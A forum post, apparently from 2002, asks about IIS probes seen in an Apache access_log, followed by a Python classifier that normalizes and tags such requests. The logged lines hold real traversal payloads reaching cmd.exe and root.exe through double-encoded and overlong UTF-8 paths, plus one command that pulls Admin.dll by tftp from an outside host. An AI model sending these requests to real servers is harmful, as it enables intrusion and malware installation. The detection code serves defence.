K@rl: new IP ... and already scanned for cmd.exe


That's life - the new IP address is only a few hours old .. and the first visitors are already leaving the entries below in access_log ...

Apparently someone is looking for a security hole on NT servers. Does anyone know more about what is going on here?

Ciao   K@rl

213.131.141.223 - - [27/Feb/2002:15:01:45 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 - "-" "-"
213.131.141.223 - - [27/Feb/2002:15:01:45 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 - "-" "-"
213.131.141.223 - - [27/Feb/2002:15:01:45 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-"
213.131.141.223 - - [27/Feb/2002:15:01:46 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-"
213.131.141.223 - - [27/Feb/2002:15:01:46 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-"
213.131.141.223 - - [27/Feb/2002:15:01:46 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-"
213.131.141.223 - - [27/Feb/2002:15:01:47 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-"
213.131.141.223 - - [27/Feb/2002:15:01:47 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-"
213.131.141.223 - - [27/Feb/2002:15:01:47 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-"
213.131.141.223 - - [27/Feb/2002:15:01:51 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
213.131.141.223 - - [27/Feb/2002:15:01:51 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-"
213.131.141.223 - - [27/Feb/2002:15:01:51 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-"
213.131.141.223 - - [27/Feb/2002:15:01:52 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
213.131.141.223 - - [27/Feb/2002:15:01:52 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
213.131.141.223 - - [27/Feb/2002:15:01:52 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-"
213.131.141.223 - - [27/Feb/2002:15:01:53 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-"
a-co26-76.tin.it - - [27/Feb/2002:17:52:44 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 - "-" "-"
a-co26-76.tin.it - - [27/Feb/2002:17:52:52 +0100] "GET /scripts/root.exe?/c+tftp%20-i%20213.45.145.50%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 - "-" "-"
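
Added example, not part of K@rl's post: a small Python classifier for access_log lines like the ones above. It decodes each request URI until it stops changing, folds the two-byte %c0/%c1 sequences to the ASCII byte a lenient decoder would produce, and tags what the request was really asking for. The function names and tag labels are assumptions made for this sketch.

```python
import re
from urllib.parse import unquote_to_bytes

# Illustrative names; request lines in SAMPLE are copied from the log above.
REQ = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
TARGETS = (b"cmd.exe", b"root.exe")

def fold_overlong(raw):
    """Map 2-byte sequences led by 0xC0/0xC1 to the ASCII byte a lenient
    decoder would produce (C0 AF -> '/', C1 9C and C1 1C -> backslash)."""
    out, i = bytearray(), 0
    while i < len(raw):
        two = raw[i] in (0xC0, 0xC1) and i + 1 < len(raw)
        out.append(((raw[i] & 1) << 6) | (raw[i + 1] & 0x3F) if two else raw[i])
        i += 2 if two else 1
    return bytes(out)

def normalize(uri, max_passes=3):
    """Percent-decode until stable; return (normalized bytes, passes needed)."""
    data, passes = uri.encode(), 0
    while passes < max_passes:
        nxt = unquote_to_bytes(data)
        if nxt == data:
            break
        data, passes = nxt, passes + 1
    return fold_overlong(data).lower(), passes

def classify(line):
    m = REQ.match(line)
    if not m:
        return None  # not an Apache common/combined log line
    host, uri, status = m.groups()
    norm, passes = normalize(uri)
    checks = [
        ("shell-binary", any(t in norm for t in TARGETS)),
        ("traversal", b"../" in norm or b"..\\" in norm),
        ("double-encoded", passes >= 2),  # e.g. %255c -> %5c -> backslash
        ("overlong-utf8", bool(re.search(r"%c[01]%", uri, re.I))),
    ]
    return {"host": host, "status": int(status), "tags": [n for n, hit in checks if hit]}

SAMPLE = [
    '213.131.141.223 - - [27/Feb/2002:15:01:45 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 - "-" "-"',
    '213.131.141.223 - - [27/Feb/2002:15:01:46 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-"',
    '213.131.141.223 - - [27/Feb/2002:15:01:51 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-"',
]
for line in SAMPLE:
    print(classify(line))
```

Matching on the normalized form rather than the raw URI is what lets one rule cover every encoding variant in the log instead of one pattern per variant.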